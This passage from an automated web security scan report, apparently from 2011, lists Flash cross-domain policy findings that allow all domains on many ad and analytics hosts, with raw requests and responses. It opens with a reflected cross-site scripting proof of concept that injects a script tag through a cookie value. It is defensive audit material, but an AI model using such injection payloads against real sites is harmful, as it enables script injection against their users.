Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.7.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861; ASP.NET_SessionId=54ocirjmvwc4xy45do1kfw55; siteuidut=3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:26:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 37861

this.STVisitorValue = "3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPortalURL = "";
this.STImgHeigh
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 73 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 18 Jul 2011 19:15:26 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.3. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 18 Jul 2011 19:18:18 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 18 Jul 2011 19:18:18 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.4. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 01:43:19 GMT
Date: Mon, 18 Jul 2011 01:43:19 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 1955

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.5. http://amch.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:13:53 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=820
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

4.6. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 17 Aug 2011 19:10:23 GMT
X-FB-Server: 10.27.254.130
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.7. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Tue, 19 Jul 2011 16:58:54 GMT
Date: Mon, 18 Jul 2011 16:58:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.8. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Tue, 19 Jul 2011 19:12:25 GMT
Date: Mon, 18 Jul 2011 19:12:25 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.9. http://bbc.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bbc.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bbc.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:58:56 GMT
Server: Omniture DC/2.0.0
xserver: www424
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://beacon.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 18 Jul 2011 19:13:56 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.11. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 18 Jul 2011 19:14:44 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.12. http://c.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 18 Jul 2011 18:11:25 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.13. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Mon, 18 Jul 2011 19:18:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.14. http://c.live.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.live.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 18 Jul 2011 18:11:22 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.15. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 18 Jul 2011 19:13:39 GMT
Date: Mon, 18 Jul 2011 19:13:39 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.16. http://cdn5.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 101
Content-Type: text/xml
Date: Mon, 18 Jul 2011 19:10:19 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.17. http://citicorporate.d2.sc.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citicorporate.d2.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: citicorporate.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 14:28:18 GMT
Server: Omniture DC/2.0.0
xserver: www1
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.18. http://cms.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 19 Jul 2011 19:18:22 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 18 Jul 2011 19:18:22 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.19. http://dg.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dg.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 18 Jul 2011 19:16:18 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.20. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Mon, 18 Jul 2011 19:10:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://feed.domaintoolsblog.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.domaintoolsblog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.domaintoolsblog.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 02:16:15 GMT
Date: Mon, 18 Jul 2011 02:16:15 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.22. http://fw.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1308159838000"
Last-Modified: Wed, 15 Jun 2011 17:43:58 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 18 Jul 2011 19:10:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.23. http://g.live.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 09 Oct 2008 18:52:49 GMT
Accept-Ranges: bytes
ETag: "fee1eb39402ac91:0"
Server: Microsoft-IIS/7.5
Date: Mon, 18 Jul 2011 18:11:34 GMT
Connection: keep-alive
Content-Length: 104

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.24. http://hits.informer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.informer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hits.informer.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 14:37:09 GMT
Content-Type: text/xml
Connection: close
Content-Length: 266
Last-Modified: Tue, 10 Nov 2009 10:24:28 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-http-reque
...[SNIP]...

4.25. http://i1.ytimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i1.ytimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 13 Jul 2011 22:53:01 GMT
Expires: Wed, 20 Jul 2011 22:53:01 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 418653

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.26. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 19-Jul-2011 16:59:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3130735210495784896; path=/; expires=Sun, 16-Oct-2011 16:59:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.27. http://in.getclicky.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
<